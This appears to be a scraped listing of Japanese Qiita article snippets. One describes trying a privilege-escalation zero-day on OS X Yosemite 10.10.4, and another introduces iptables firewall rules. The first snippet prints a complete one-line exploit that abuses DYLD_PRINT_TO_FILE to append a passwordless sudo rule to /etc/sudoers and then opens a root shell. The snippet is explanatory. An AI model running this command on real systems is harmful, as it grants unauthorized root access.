Yosemite10.10.4で権限昇格のゼロデイを試してみる - Qiita
はじめに 6月頃から話題になってたようですが、早くも簡単に実行するコマンドがアップされていました。 echo 'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo -s # via reddit: numinit (shorter) — Stefan Esser (@i0n1c) 2015, 7月 22 権限昇格の脆弱性(Exploit)というのは、パスワードを回避して上級ユーザーにログインする感じのものを言います。今回のコマンドもそんな感じで、パスワード入力なしにsudo suが実行されます。 また、ここで言うゼロデイ(0day)というのは公式では修正されていない脆弱性、一般には知られていない脆弱性のことを言います。0dayだと、対象となるOS及びツールなど
iptablesを使いこなす - Qiita
はじめに iptablesというのは、Firewall(ファイアウォール)の一種で外部からのアクセスを制限するルールを設定します。iptablesの他には、ufwが有名です。 ufwのほうがシンプルに使えますが、iptablesのほうが一般的です。 Arch Linuxの場合は、iproute2が依存しているためデフォルトでもインストールされます。 iptables.rules iptables.rulesというのは、iptablesのルールを書いた設定ファイルです。デフォルトで置かれてる場合もあれば、ない場合もあります。ない場合は、/usr/shareや/etc/iptablesなどからサンプルファイルがあると思うので、それを持ってきて編集しましょう。例えば、Arch Linuxの場合は、以下の様な形でシンプルな設定が一瞬で可能となります。ただし、この設定は中身を見てもらっても分かる通り
1
リリース、障害情報などのサービスのお知らせ
最新の人気エントリーの配信
処理を実行中です
j次のブックマーク
k前のブックマーク
lあとで読む
eコメント一覧を開く
oページを開く
